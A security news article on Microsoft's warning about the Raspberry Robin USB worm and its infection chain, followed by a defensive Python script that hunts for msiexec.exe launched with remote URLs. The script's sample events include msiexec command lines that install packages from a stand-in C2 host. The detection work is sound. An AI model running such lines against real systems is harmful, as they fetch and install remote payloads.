Raspberry Robin: Microsoft has found this high-risk worm

Microsoft researchers warn about the high-risk worm Raspberry Robin, which is infecting hundreds of Windows corporate networks.

Cybersecurity researchers are constantly working to prevent old and new threats from jeopardizing users' devices and the security of their data. In this regard, Microsoft has recently warned of a worm considered high risk that is infecting hundreds of Windows corporate networks.

Raspberry Robin: it is infecting hundreds of Windows corporate networks

The malware in question, dubbed Raspberry Robin, spreads via USB devices and was first spotted in September 2021 by researchers at Red Canary. Cybersecurity firm Sekoia said it had also found it using various QNAP NAS devices as command and control servers in early November 2021. However, the first malicious artifacts linked to the worm date back to 2019.

Infection begins when a user clicks the .LNK file present on an infected USB drive. The worm then creates an msiexec.exe process via the Command Prompt and starts another malicious file. It then communicates with the command and control servers using a short URL. If the connection is successful, it proceeds to download and install a number of other malicious DLLs, which attempt to communicate with Tor nodes.

It is worth keeping in mind that although infected computers have communicated with the Tor network, the attackers behind Raspberry Robin have not yet taken steps to use this access to obtain sensitive information, despite the fact that they can easily bypass UAC (User Account Control) by exploiting Windows utilities.
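The msiexec.exe step described above can be hunted for in process-creation telemetry. The following is an added example, not code from Microsoft, Red Canary or Sekoia. It assumes the events carry the Sysmon Event ID 1 fields `Image`, `ParentImage` and `CommandLine`, and that the remote URL appears on the msiexec.exe command line; the sample events and the `c2.example` host are constructed.

```python
import re
from urllib.parse import urlsplit

# Constructed sample events (Sysmon Event ID 1 field names; all values invented).
EVENTS = [
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "msiexec /q /i http://c2.example:8080/token"},
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'msiexec /i "C:\Users\a\Downloads\setup.msi"'},
    {"Image": r"C:\Windows\System32\MSIEXEC.EXE",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'mSiExEc /Q -I"hTTp://c2.example:8080/x"'},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "cmd.exe /c dir"},
]

# Case-insensitive so that unusual casing on the command line still matches.
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def check_event(event):
    """Return a finding if msiexec.exe was started with a remote URL, else None."""
    if basename(event.get("Image", "")) != "msiexec.exe":
        return None
    urls = URL_RE.findall(event.get("CommandLine", ""))
    if not urls:
        return None  # local .msi installs are routine and not flagged
    parent = basename(event.get("ParentImage", ""))
    return {
        "url": urls[0],
        "host": urlsplit(urls[0]).hostname,
        "parent": parent,
        # A Command Prompt parent matches the chain described in the article.
        "severity": "high" if parent == "cmd.exe" else "medium",
    }

def scan(events):
    """Run check_event over all events and keep the findings."""
    return [f for f in map(check_event, events) if f]

if __name__ == "__main__":
    for finding in scan(EVENTS):
        print(finding)
```

Legitimate software deployment tools also install MSI packages from URLs, so findings should be reviewed against known internal distribution hosts before escalation.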